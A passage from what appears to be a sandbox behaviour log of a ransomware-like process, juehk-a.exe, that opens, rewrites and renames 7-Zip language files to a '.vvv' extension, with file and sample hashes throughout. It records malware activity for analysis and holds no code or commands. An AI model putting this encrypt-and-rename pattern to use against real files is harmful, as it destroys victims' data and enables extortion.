11893.            imagepath: C:\Users\Administrator\AppData\Roaming\juehk-a.exe
11894.            md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
11895.            ads:
11896.          fid (ads:): 562949953519758
11897.          ntstatus: 0x0
11898.          CreateOptions: 0x0
11899.        file:
11900.          timestamp: 66389
11901.          mode: rename
11902.          sequenceNumber: 860
11903.          filesize: 13662
11904.          md5sum: 3c96bfae5736bab33faea284c0e9d21c
11905.          sha1sum: 9fd4f816ed2e8034fee9dd2d7e2736df9031c98a
11906.          processinfo:
11907.            pid: 1648
11908.            imagepath: C:\Users\Administrator\AppData\Roaming\juehk-a.exe
11909.            md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
11910.          old_name: C:\Program Files\7-Zip\Lang\lt.txt
11911.          new_name: C:\Program Files\7-Zip\Lang\lt.txt.vvv
11912.            ads:
11913.          fid (ads:): 562949953519758
11914.          ntstatus: 0x0
11915.          CreateOptions: 0x0
11916.        file:
11917.          timestamp: 66420
11918.          mode: open
11919.          sequenceNumber: 861
11920.          value: C:\Program Files\7-Zip\Lang\lv.txt
11921.          filesize: 10690
11922.          processinfo:
11923.            pid: 1648
11924.            imagepath: C:\Users\Administrator\AppData\Roaming\juehk-a.exe
11925.            md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
11926.            ads:
11927.          fid (ads:): 562949953519759
11928.          ntstatus: 0x0
11929.          CreateOptions: 0x60
11930.        file:
11931.          timestamp: 66614
11932.          mode: close
11933.          sequenceNumber: 862
11934.          value: C:\Program Files\7-Zip\Lang\lv.txt
11935.          filesize: 11118
11936.          md5sum: 361c444c91a31ceaf2a36b1156b908b7
11937.          sha1sum: fe536ada65ea429ad7b6679697087cd7cc9b4a2a
11938.          processinfo:
11939.            pid: 1648
11940.            imagepath: C:\Users\Administrator\AppData\Roaming\juehk-a.exe
11941.            md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
11942.            ads:
11943.          fid (ads:): 562949953519759
11944.          ntstatus: 0x0
11945.          CreateOptions: 0x0
11946.        file:
11947.          timestamp: 66624
11948.          mode: rename
11949.          sequenceNumber: 863
11950.          filesize: 11118
11951.          md5sum: 361c444c91a31ceaf2a36b1156b908b7
11952.          sha1sum: fe536ada65ea429ad7b6679697087cd7cc9b4a2a
11953.          processinfo:
11954.            pid: 1648
11955.            imagepath: C:\Users\Administrator\AppData\Roaming\juehk-a.exe
11956.            md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
11957.          old_name: C:\Program Files\7-Zip\Lang\lv.txt
11958.          new_name: C:\Program Files\7-Zip\Lang\lv.txt.vvv
11959.            ads:
11960.          fid (ads:): 562949953519759
11961.          ntstatus: 0x0
11962.          CreateOptions: 0x0
11963.        file:
11964.          timestamp: 66632
11965.          mode: open
11966.          sequenceNumber: 864
11967.          value: C:\Program Files\7-Zip\Lang\mk.txt
11968.          filesize: 15080
11969.          processinfo:
11970.            pid: 1648
11971.            imagepath: C:\Users\Administrator\AppData\Roaming\juehk-a.exe
11972.            md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
11973.            ads:
11974.          fid (ads:): 562949953519760
11975.          ntstatus: 0x0
11976.          CreateOptions: 0x60
11977.        file:
11978.          timestamp: 66640
11979.          mode: close
11980.          sequenceNumber: 865
11981.          value: C:\Program Files\7-Zip\Lang\mk.txt
11982.          filesize: 15502
11983.          md5sum: 20fa443b56991b5a36f947c2449bd6fa
11984.          sha1sum: b4182e1ade7dc7d4d314909d294b2ee521bbd8e2
11985.          processinfo:
11986.            pid: 1648
11987.            imagepath: C:\Users\Administrator\AppData\Roaming\juehk-a.exe
11988.            md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
11989.            ads:
11990.          fid (ads:): 562949953519760
11991.          ntstatus: 0x0
11992.          CreateOptions: 0x0
11993.        file:
11994.          timestamp: 66649
11995.          mode: rename
11996.          sequenceNumber: 866
11997.          filesize: 15502
11998.          md5sum: 20fa443b56991b5a36f947c2449bd6fa
11999.          sha1sum: b4182e1ade7dc7d4d314909d294b2ee521bbd8e2
12000.          processinfo:
12001.            pid: 1648
12002.            imagepath: C:\Users\Administrator\AppData\Roaming\juehk-a.exe
12003.            md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
12004.          old_name: C:\Program Files\7-Zip\Lang\mk.txt
12005.          new_name: C:\Program Files\7-Zip\Lang\mk.txt.vvv
12006.            ads:
12007.          fid (ads:): 562949953519760
12008.          ntstatus: 0x0
12009.          CreateOptions: 0x0
12010.        file:
12011.          timestamp: 66656
12012.          mode: open
12013.          sequenceNumber: 867
12014.          value: C:\Program Files\7-Zip\Lang\mn.txt
12015.          filesize: 14657
12016.          processinfo:
12017.            pid: 1648
12018.            imagepath: C:\Users\Administrator\AppData\Roaming\juehk-a.exe
12019.            md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
12020.            ads:
12021.          fid (ads:): 562949953519761
12022.          ntstatus: 0x0
12023.          CreateOptions: 0x60
12024.        file:
12025.          timestamp: 66777
12026.          mode: close
12027.          sequenceNumber: 868
12028.          value: C:\Program Files\7-Zip\Lang\mn.txt
12029.          filesize: 15086
12030.          md5sum: 1ef19ba217ee21e95f9e6879e46795c5
12031.          sha1sum: a187b01d883bdf68b67ca0396a84e149cea7e821
12032.          processinfo:
12033.            pid: 1648
12034.            imagepath: C:\Users\Administrator\AppData\Roaming\juehk-a.exe
12035.            md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
12036.            ads:
12037.          fid (ads:): 562949953519761
12038.          ntstatus: 0x0
12039.          CreateOptions: 0x0
12040.        file:
12041.          timestamp: 66836
12042.          mode: rename
12043.          sequenceNumber: 869
12044.          filesize: 15086
12045.          md5sum: 1ef19ba217ee21e95f9e6879e46795c5
12046.          sha1sum: a187b01d883bdf68b67ca0396a84e149cea7e821
12047.          processinfo:
12048.            pid: 1648
12049.            imagepath: C:\Users\Administrator\AppData\Roaming\juehk-a.exe
12050.            md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
12051.          old_name: C:\Program Files\7-Zip\Lang\mn.txt
12052.          new_name: C:\Program Files\7-Zip\Lang\mn.txt.vvv
12053.            ads:
12054.          fid (ads:): 562949953519761
12055.          ntstatus: 0x0
12056.          CreateOptions: 0x0
12057.        file:
12058.          timestamp: 66867
12059.          mode: open
12060.          sequenceNumber: 870
12061.          value: C:\Program Files\7-Zip\Lang\mr.txt
12062.          filesize: 17597
12063.          processinfo:
12064.            pid: 1648
12065.            imagepath: C:\Users\Administrator\AppData\Roaming\juehk-a.exe
12066.            md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
12067.            ads:
12068.          fid (ads:): 562949953519762
12069.          ntstatus: 0x0
12070.          CreateOptions: 0x60
12071.        file:
12072.          timestamp: 67021
12073.          mode: close
12074.          sequenceNumber: 871
12075.          value: C:\Program Files\7-Zip\Lang\mr.txt
12076.          filesize: 18014
12077.          md5sum: 027ee98c5cc370e962d321f909e775e3
12078.          sha1sum: b10b3acd9391841a84f28ae4f6a38e3307c85e3c
12079.          processinfo:
12080.            pid: 1648
12081.            imagepath: C:\Users\Administrator\AppData\Roaming\juehk-a.exe
12082.            md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
12083.            ads:
12084.          fid (ads:): 562949953519762
12085.          ntstatus: 0x0
12086.          CreateOptions: 0x0
12087.        file:
12088.          timestamp: 67039
12089.          mode: rename
12090.          sequenceNumber: 872
12091.          filesize: 18014
12092.          md5sum: 027ee98c5cc370e962d321f909e775e3
12093.          sha1sum: b10b3acd9391841a84f28ae4f6a38e3307c85e3c
12094.          processinfo:
12095.            pid: 1648
12096.            imagepath: C:\Users\Administrator\AppData\Roaming\juehk-a.exe
12097.            md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
12098.          old_name: C:\Program Files\7-Zip\Lang\mr.txt
12099.          new_name: C:\Program Files\7-Zip\Lang\mr.txt.vvv
12100.            ads:
12101.          fid (ads:): 562949953519762
12102.          ntstatus: 0x0
12103.          CreateOptions: 0x0
12104.        file:
12105.          timestamp: 67055
12106.          mode: open
12107.          sequenceNumber: 873
12108.          value: C:\Program Files\7-Zip\Lang\ms.txt
12109.          filesize: 10409
12110.          processinfo:
12111.            pid: 1648
12112.            imagepath: C:\Users\Administrator\AppData\Roaming\juehk-a.exe
12113.            md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
12114.            ads:
12115.          fid (ads:): 562949953519763
12116.          ntstatus: 0x0
12117.          CreateOptions: 0x60
12118.        file:
12119.          timestamp: 67067
12120.          mode: close
12121.          sequenceNumber: 874
12122.          value: C:\Program Files\7-Zip\Lang\ms.txt
12123.          filesize: 10830
12124.          md5sum: 8f13333b68ec08ecb97bf863a77129c1
12125.          sha1sum: 08ea30eb9666da62d4eaa67a7dd02b5555b18819
12126.          processinfo:
12127.            pid: 1648
12128.            imagepath: C:\Users\Administrator\AppData\Roaming\juehk-a.exe
12129.            md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
12130.            ads:
12131.          fid (ads:): 562949953519763
12132.          ntstatus: 0x0
12133.          CreateOptions: 0x0
12134.        file:
12135.          timestamp: 67074
12136.          mode: rename
12137.          sequenceNumber: 875
12138.          filesize: 10830
12139.          md5sum: 8f13333b68ec08ecb97bf863a77129c1
12140.          sha1sum: 08ea30eb9666da62d4eaa67a7dd02b5555b18819
12141.          processinfo:
12142.            pid: 1648
12143.            imagepath: C:\Users\Administrator\AppData\Roaming\juehk-a.exe
12144.            md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
12145.          old_name: C:\Program Files\7-Zip\Lang\ms.txt
12146.          new_name: C:\Program Files\7-Zip\Lang\ms.txt.vvv
12147.            ads:
12148.          fid (ads:): 562949953519763
12149.          ntstatus: 0x0
12150.          CreateOptions: 0x0
12151.        file:
12152.          timestamp: 67079
12153.          mode: open
12154.          sequenceNumber: 876
12155.          value: C:\Program Files\7-Zip\Lang\nb.txt
12156.          filesize: 11767
12157.          processinfo:
12158.            pid: 1648
12159.            imagepath: C:\Users\Administrator\AppData\Roaming\juehk-a.exe
12160.            md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
12161.            ads:
12162.          fid (ads:): 562949953519766
12163.          ntstatus: 0x0
12164.          CreateOptions: 0x60
12165.        file:
12166.          timestamp: 67139
12167.          mode: close
12168.          sequenceNumber: 877
12169.          value: C:\Program Files\7-Zip\Lang\nb.txt
12170.          filesize: 12190
12171.          md5sum: d49e1041a64134e5ba5094c39eb038a0
12172.          sha1sum: 9c524670e751263403f0c3bc98057dc6a64e263b
12173.          processinfo:
12174.            pid: 1648
12175.            imagepath: C:\Users\Administrator\AppData\Roaming\juehk-a.exe
12176.            md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
12177.            ads:
12178.          fid (ads:): 562949953519766
12179.          ntstatus: 0x0
12180.          CreateOptions: 0x0
12181.        file:
12182.          timestamp: 67146
12183.          mode: rename
12184.          sequenceNumber: 878
12185.          filesize: 12190
12186.          md5sum: d49e1041a64134e5ba5094c39eb038a0
12187.          sha1sum: 9c524670e751263403f0c3bc98057dc6a64e263b
12188.          processinfo:
12189.            pid: 1648
12190.            imagepath: C:\Users\Administrator\AppData\Roaming\juehk-a.exe
12191.            md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
12192.          old_name: C:\Program Files\7-Zip\Lang\nb.txt
12193.          new_name: C:\Program Files\7-Zip\Lang\nb.txt.vvv
12194.            ads:
12195.          fid (ads:): 562949953519766
12196.          ntstatus: 0x0
12197.          CreateOptions: 0x0
12198.        file:
12199.          timestamp: 67151
12200.          mode: open
12201.          sequenceNumber: 879
12202.          value: C:\Program Files\7-Zip\Lang\ne.txt
12203.          filesize: 21822
12204.          processinfo:
12205.            pid: 1648
12206.            imagepath: C:\Users\Administrator\AppData\Roaming\juehk-a.exe
12207.            md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
12208.            ads:
12209.          fid (ads:): 562949953519764
12210.          ntstatus: 0x0
12211.          CreateOptions: 0x60
12212.        file:
12213.          timestamp: 67299
12214.          mode: close
12215.          sequenceNumber: 880
12216.          value: C:\Program Files\7-Zip\Lang\ne.txt
12217.          filesize: 22238
12218.          md5sum: e88c7504cb38f263a3546344d0e6f305
12219.          sha1sum: 56ab5293f58af90d7110cc9fc1a3505703c5387f
12220.          processinfo:
12221.            pid: 1648
12222.            imagepath: C:\Users\Administrator\AppData\Roaming\juehk-a.exe
12223.            md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
12224.            ads:
12225.          fid (ads:): 562949953519764
12226.          ntstatus: 0x0
12227.          CreateOptions: 0x0
12228.        file:
12229.          timestamp: 67334
12230.          mode: rename
12231.          sequenceNumber: 881
12232.          filesize: 22238
12233.          md5sum: e88c7504cb38f263a3546344d0e6f305
12234.          sha1sum: 56ab5293f58af90d7110cc9fc1a3505703c5387f
12235.          processinfo:
12236.            pid: 1648
12237.            imagepath: C:\Users\Administrator\AppData\Roaming\juehk-a.exe
12238.            md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
12239.          old_name: C:\Program Files\7-Zip\Lang\ne.txt
12240.          new_name: C:\Program Files\7-Zip\Lang\ne.txt.vvv
12241.            ads:
12242.          fid (ads:): 562949953519764
12243.          ntstatus: 0x0
12244.          CreateOptions: 0x0
12245.        file:
12246.          timestamp: 67349
12247.          mode: open
12248.          sequenceNumber: 882
12249.          value: C:\Program Files\7-Zip\Lang\nl.txt
12250.          filesize: 14213
12251.          processinfo:
12252.            pid: 1648
12253.            imagepath: C:\Users\Administrator\AppData\Roaming\juehk-a.exe
12254.            md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
12255.            ads:
12256.          fid (ads:): 562949953519765
12257.          ntstatus: 0x0
12258.          CreateOptions: 0x60
12259.        file:
12260.          timestamp: 67649
12261.          mode: close
12262.          sequenceNumber: 883
12263.          value: C:\Program Files\7-Zip\Lang\nl.txt
12264.          filesize: 14638
12265.          md5sum: c9bef09005f197e43dc31c4da6f1e7c6
12266.          sha1sum: 60edf45b0eed7d1e94bcee7689ca673db528885c
12267.          processinfo:
12268.            pid: 1648
12269.            imagepath: C:\Users\Administrator\AppData\Roaming\juehk-a.exe
12270.            md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
12271.            ads:
12272.          fid (ads:): 562949953519765
12273.          ntstatus: 0x0
12274.          CreateOptions: 0x0
12275.        file:
12276.          timestamp: 67659
12277.          mode: rename
12278.          sequenceNumber: 884
12279.          filesize: 14638
12280.          md5sum: c9bef09005f197e43dc31c4da6f1e7c6
12281.          sha1sum: 60edf45b0eed7d1e94bcee7689ca673db528885c
12282.          processinfo:
12283.            pid: 1648
12284.            imagepath: C:\Users\Administrator\AppData\Roaming\juehk-a.exe
12285.            md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
12286.          old_name: C:\Program Files\7-Zip\Lang\nl.txt
12287.          new_name: C:\Program Files\7-Zip\Lang\nl.txt.vvv
12288.            ads:
12289.          fid (ads:): 562949953519765
12290.          ntstatus: 0x0
12291.          CreateOptions: 0x0
12292.        file:
12293.          timestamp: 67671
12294.          mode: open
12295.          sequenceNumber: 885
12296.          value: C:\Program Files\7-Zip\Lang\nn.txt
12297.          filesize: 11500
12298.          processinfo:
12299.            pid: 1648
12300.            imagepath: C:\Users\Administrator\AppData\Roaming\juehk-a.exe
12301.            md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
12302.            ads:
12303.          fid (ads:): 562949953519767
12304.          ntstatus: 0x0
12305.          CreateOptions: 0x60
12306.        file:
12307.          timestamp: 67769
12308.          mode: close
12309.          sequenceNumber: 886
12310.          value: C:\Program Files\7-Zip\Lang\nn.txt
12311.          filesize: 11918
12312.          md5sum: 81f6813e70a3db76ad43d375b3e018cb
12313.          sha1sum: d05091c1cd021b3e067a46f19a287464a94c7220
12314.          processinfo:
12315.            pid: 1648
12316.            imagepath: C:\Users\Administrator\AppData\Roaming\juehk-a.exe
12317.            md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
12318.            ads:
12319.          fid (ads:): 562949953519767
12320.          ntstatus: 0x0
12321.          CreateOptions: 0x0
12322.        file:
12323.          timestamp: 67798
12324.          mode: rename
12325.          sequenceNumber: 887
12326.          filesize: 11918
12327.          md5sum: 81f6813e70a3db76ad43d375b3e018cb
12328.          sha1sum: d05091c1cd021b3e067a46f19a287464a94c7220
12329.          processinfo:
12330.            pid: 1648
12331.            imagepath: C:\Users\Administrator\AppData\Roaming\juehk-a.exe
12332.            md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
12333.          old_name: C:\Program Files\7-Zip\Lang\nn.txt
12334.          new_name: C:\Program Files\7-Zip\Lang\nn.txt.vvv
12335.            ads:
12336.          fid (ads:): 562949953519767
12337.          ntstatus: 0x0
12338.          CreateOptions: 0x0
12339.        file:
12340.          timestamp: 67857
12341.          mode: open
12342.          sequenceNumber: 888
12343.          value: C:\Program Files\7-Zip\Lang\pa-in.txt
12344.          filesize: 22849
12345.          processinfo:
12346.            pid: 1648
12347.            imagepath: C:\Users\Administrator\AppData\Roaming\juehk-a.exe
12348.            md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
12349.            ads:
12350.          fid (ads:): 562949953519768
12351.          ntstatus: 0x0
12352.          CreateOptions: 0x60
12353.        file:
12354.          timestamp: 67987
12355.          mode: close
12356.          sequenceNumber: 889
12357.          value: C:\Program Files\7-Zip\Lang\pa-in.txt
12358.          filesize: 23278
12359.          md5sum: ffa6d7459acf66a001b7eb4af0da4a0d
12360.          sha1sum: a1609711f5379aade24b2a956ff4a9d4d9896d29
12361.          processinfo:
12362.            pid: 1648
12363.            imagepath: C:\Users\Administrator\AppData\Roaming\juehk-a.exe
12364.            md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
12365.            ads:
12366.          fid (ads:): 562949953519768
12367.          ntstatus: 0x0
12368.          CreateOptions: 0x0
12369.        file:
12370.          timestamp: 68006
12371.          mode: rename
12372.          sequenceNumber: 890
12373.          filesize: 23278
12374.          md5sum: ffa6d7459acf66a001b7eb4af0da4a0d
12375.          sha1sum: a1609711f5379aade24b2a956ff4a9d4d9896d29
12376.          processinfo:
12377.            pid: 1648
12378.            imagepath: C:\Users\Administrator\AppData\Roaming\juehk-a.exe
12379.            md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
12380.          old_name: C:\Program Files\7-Zip\Lang\pa-in.txt
12381.          new_name: C:\Program Files\7-Zip\Lang\pa-in.txt.vvv
12382.            ads:
12383.          fid (ads:): 562949953519768
12384.          ntstatus: 0x0
12385.          CreateOptions: 0x0
12386.        file:
12387.          timestamp: 68035
12388.          mode: open
12389.          sequenceNumber: 891
12390.          value: C:\Program Files\7-Zip\Lang\pl.txt
12391.          filesize: 14102
12392.          processinfo:
12393.            pid: 1648
12394.            imagepath: C:\Users\Administrator\AppData\Roaming\juehk-a.exe
12395.            md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
12396.            ads:
12397.          fid (ads:): 562949953519769
12398.          ntstatus: 0x0
12399.          CreateOptions: 0x60
12400.        file:
12401.          timestamp: 68049
12402.          mode: close
12403.          sequenceNumber: 892
12404.          value: C:\Program Files\7-Zip\Lang\pl.txt
12405.          filesize: 14526
12406.          md5sum: d8d9b951c944bb0bb1a91471b07b7916
12407.          sha1sum: 01fdb8ab9722d3fe5d2dc4b3441a884f8acd5bc6
12408.          processinfo:
12409.            pid: 1648
12410.            imagepath: C:\Users\Administrator\AppData\Roaming\juehk-a.exe
12411.            md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
12412.            ads:
12413.          fid (ads:): 562949953519769
12414.          ntstatus: 0x0
12415.          CreateOptions: 0x0
12416.        file:
12417.          timestamp: 68063
12418.          mode: rename
12419.          sequenceNumber: 893
12420.          filesize: 14526
12421.          md5sum: d8d9b951c944bb0bb1a91471b07b7916
12422.          sha1sum: 01fdb8ab9722d3fe5d2dc4b3441a884f8acd5bc6
12423.          processinfo:
12424.            pid: 1648
12425.            imagepath: C:\Users\Administrator\AppData\Roaming\juehk-a.exe
12426.            md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
12427.          old_name: C:\Program Files\7-Zip\Lang\pl.txt
12428.          new_name: C:\Program Files\7-Zip\Lang\pl.txt.vvv
12429.            ads:
12430.          fid (ads:): 562949953519769
12431.          ntstatus: 0x0
12432.          CreateOptions: 0x0
12433.        file:
12434.          timestamp: 68072
12435.          mode: open
12436.          sequenceNumber: 894
12437.          value: C:\Program Files\7-Zip\Lang\ps.txt
12438.          filesize: 15131
12439.          processinfo:
12440.            pid: 1648
12441.            imagepath: C:\Users\Administrator\AppData\Roaming\juehk-a.exe
12442.            md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
12443.            ads:
12444.          fid (ads:): 562949953519770
12445.          ntstatus: 0x0
12446.          CreateOptions: 0x60
12447.        file:
12448.          timestamp: 68078
12449.          mode: close
12450.          sequenceNumber: 895
12451.          value: C:\Program Files\7-Zip\Lang\ps.txt
12452.          filesize: 15550
12453.          md5sum: b323884844afcd0e27c61b28a07a70be
12454.          sha1sum: 4c9e51cb585270f4e24adfb2b61b4ac033402699
12455.          processinfo:
12456.            pid: 1648
12457.            imagepath: C:\Users\Administrator\AppData\Roaming\juehk-a.exe
12458.            md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
12459.            ads:
12460.          fid (ads:): 562949953519770
12461.          ntstatus: 0x0
12462.          CreateOptions: 0x0
12463.        file:
12464.          timestamp: 68085
12465.          mode: rename
12466.          sequenceNumber: 896
12467.          filesize: 15550
12468.          md5sum: b323884844afcd0e27c61b28a07a70be
12469.          sha1sum: 4c9e51cb585270f4e24adfb2b61b4ac033402699
12470.          processinfo:
12471.            pid: 1648
12472.            imagepath: C:\Users\Administrator\AppData\Roaming\juehk-a.exe
12473.            md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
12474.          old_name: C:\Program Files\7-Zip\Lang\ps.txt
12475.          new_name: C:\Program Files\7-Zip\Lang\ps.txt.vvv
12476.            ads:
12477.          fid (ads:): 562949953519770
12478.          ntstatus: 0x0
12479.          CreateOptions: 0x0
12480.        file:
12481.          timestamp: 68092
12482.          mode: open
12483.          sequenceNumber: 897
12484.          value: C:\Program Files\7-Zip\Lang\pt-br.txt
12485.          filesize: 13864
12486.          processinfo:
12487.            pid: 1648
12488.            imagepath: C:\Users\Administrator\AppData\Roaming\juehk-a.exe
12489.            md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
12490.            ads:
12491.          fid (ads:): 562949953519772
12492.          ntstatus: 0x0
12493.          CreateOptions: 0x60
12494.        file:
12495.          timestamp: 68147
12496.          mode: close
12497.          sequenceNumber: 898
12498.          value: C:\Program Files\7-Zip\Lang\pt-br.txt
12499.          filesize: 14286
12500.          md5sum: 417b4ba50ea17b6d968e4804e7bf089b
12501.          sha1sum: ad9d8c5e7e7f3cb8b26b662c487425ad9a662360
12502.          processinfo:
12503.            pid: 1648
12504.            imagepath: C:\Users\Administrator\AppData\Roaming\juehk-a.exe
12505.            md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
12506.            ads:
12507.          fid (ads:): 562949953519772
12508.          ntstatus: 0x0
12509.          CreateOptions: 0x0
12510.        file:
12511.          timestamp: 68154
12512.          mode: rename
12513.          sequenceNumber: 899
12514.          filesize: 14286
12515.          md5sum: 417b4ba50ea17b6d968e4804e7bf089b
12516.          sha1sum: ad9d8c5e7e7f3cb8b26b662c487425ad9a662360
12517.          processinfo:
12518.            pid: 1648
12519.            imagepath: C:\Users\Administrator\AppData\Roaming\juehk-a.exe
12520.            md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
12521.          old_name: C:\Program Files\7-Zip\Lang\pt-br.txt
12522.          new_name: C:\Program Files\7-Zip\Lang\pt-br.txt.vvv
12523.            ads:
12524.          fid (ads:): 562949953519772
12525.          ntstatus: 0x0
12526.          CreateOptions: 0x0
12527.        file:
12528.          timestamp: 68160
12529.          mode: open
12530.          sequenceNumber: 900
12531.          value: C:\Program Files\7-Zip\Lang\pt.txt
12532.          filesize: 14007
12533.          processinfo:
12534.            pid: 1648
12535.            imagepath: C:\Users\Administrator\AppData\Roaming\juehk-a.exe
12536.            md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
12537.            ads:
12538.          fid (ads:): 562949953519771
12539.          ntstatus: 0x0
12540.          CreateOptions: 0x60
12541.        apicall:
12542.          timestamp: 68174
12543.          repeat: 300
12544.          sequenceNumber: 901
12545.          processinfo:
12546.            pid: 1648
12547.            imagepath: C:\Users\Administrator\AppData\Roaming\juehk-a.exe
12548.            md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
12549.          dllname: kernel32.dll
12550.          apiname: Sleep
12551.          address: 0x0041ed5b
12552.        file:
12553.          timestamp: 68305
12554.          mode: close
12555.          sequenceNumber: 902
12556.          value: C:\Program Files\7-Zip\Lang\pt.txt
12557.          filesize: 14430
12558.          md5sum: 8a797eefd110503b66981fb357df36ee
12559.          sha1sum: d2c771795a173ffd6f6e5f36a710f2962a80ba9d
12560.          processinfo:
12561.            pid: 1648
12562.            imagepath: C:\Users\Administrator\AppData\Roaming\juehk-a.exe
12563.            md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
12564.            ads:
12565.          fid (ads:): 562949953519771
12566.          ntstatus: 0x0
12567.          CreateOptions: 0x0
12568.        file:
12569.          timestamp: 68408
12570.          mode: rename
12571.          sequenceNumber: 903
12572.          filesize: 14430
12573.          md5sum: 8a797eefd110503b66981fb357df36ee
12574.          sha1sum: d2c771795a173ffd6f6e5f36a710f2962a80ba9d
12575.          processinfo:
12576.            pid: 1648
12577.            imagepath: C:\Users\Administrator\AppData\Roaming\juehk-a.exe
12578.            md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
12579.          old_name: C:\Program Files\7-Zip\Lang\pt.txt
12580.          new_name: C:\Program Files\7-Zip\Lang\pt.txt.vvv
12581.            ads:
12582.          fid (ads:): 562949953519771
12583.          ntstatus: 0x0
12584.          CreateOptions: 0x0
12585.        file:
12586.          timestamp: 68531
12587.          mode: open
12588.          sequenceNumber: 904
12589.          value: C:\Program Files\7-Zip\Lang\ro.txt
12590.          filesize: 13994
12591.          processinfo:
12592.            pid: 1648
12593.            imagepath: C:\Users\Administrator\AppData\Roaming\juehk-a.exe
12594.            md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
12595.            ads:
12596.          fid (ads:): 562949953519773
12597.          ntstatus: 0x0
12598.          CreateOptions: 0x60
12599.        file:
12600.          timestamp: 68733
12601.          mode: close
12602.          sequenceNumber: 905
12603.          value: C:\Program Files\7-Zip\Lang\ro.txt
12604.          filesize: 14414
12605.          md5sum: 260a837c58772bf909987c2e192ab4d5
12606.          sha1sum: 6394657ebfb051fccbf9df80dba8523cd34ff6d0
12607.          processinfo:
12608.            pid: 1648
12609.            imagepath: C:\Users\Administrator\AppData\Roaming\juehk-a.exe
12610.            md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
12611.            ads:
12612.          fid (ads:): 562949953519773
12613.          ntstatus: 0x0
12614.          CreateOptions: 0x0
12615.        file:
12616.          timestamp: 68759
12617.          mode: rename
12618.          sequenceNumber: 906
12619.          filesize: 14414
12620.          md5sum: 260a837c58772bf909987c2e192ab4d5
12621.          sha1sum: 6394657ebfb051fccbf9df80dba8523cd34ff6d0
12622.          processinfo:
12623.            pid: 1648
12624.            imagepath: C:\Users\Administrator\AppData\Roaming\juehk-a.exe
12625.            md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
12626.          old_name: C:\Program Files\7-Zip\Lang\ro.txt
12627.          new_name: C:\Program Files\7-Zip\Lang\ro.txt.vvv
12628.            ads:
12629.          fid (ads:): 562949953519773
12630.          ntstatus: 0x0
12631.          CreateOptions: 0x0
12632.        file:
12633.          timestamp: 68773
12634.          mode: open
12635.          sequenceNumber: 907
12636.          value: C:\Program Files\7-Zip\Lang\ru.txt
12637.          filesize: 19107
12638.          processinfo:
12639.            pid: 1648
12640.            imagepath: C:\Users\Administrator\AppData\Roaming\juehk-a.exe
12641.            md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
12642.            ads:
12643.          fid (ads:): 562949953519774
12644.          ntstatus: 0x0
12645.          CreateOptions: 0x60
12646.        file:
12647.          timestamp: 69174
12648.          mode: close
12649.          sequenceNumber: 908
12650.          value: C:\Program Files\7-Zip\Lang\ru.txt
12651.          filesize: 19534
12652.          md5sum: a2f5ee6028e34952ff349f58258ea825
12653.          sha1sum: ac03b8ca0ba59ba4e663d6798821012cc239c64b
12654.          processinfo:
12655.            pid: 1648
12656.            imagepath: C:\Users\Administrator\AppData\Roaming\juehk-a.exe
12657.            md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
12658.            ads:
12659.          fid (ads:): 562949953519774
12660.          ntstatus: 0x0
12661.          CreateOptions: 0x0
12662.        file:
12663.          timestamp: 69182
12664.          mode: rename
12665.          sequenceNumber: 909
12666.          filesize: 19534
12667.          md5sum: a2f5ee6028e34952ff349f58258ea825
12668.          sha1sum: ac03b8ca0ba59ba4e663d6798821012cc239c64b
12669.          processinfo:
12670.            pid: 1648
12671.            imagepath: C:\Users\Administrator\AppData\Roaming\juehk-a.exe
12672.            md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
12673.          old_name: C:\Program Files\7-Zip\Lang\ru.txt
12674.          new_name: C:\Program Files\7-Zip\Lang\ru.txt.vvv
12675.            ads:
12676.          fid (ads:): 562949953519774
12677.          ntstatus: 0x0
12678.          CreateOptions: 0x0
12679.        file:
12680.          timestamp: 69190
12681.          mode: open
12682.          sequenceNumber: 910
12683.          value: C:\Program Files\7-Zip\Lang\sa.txt
12684.          filesize: 28434
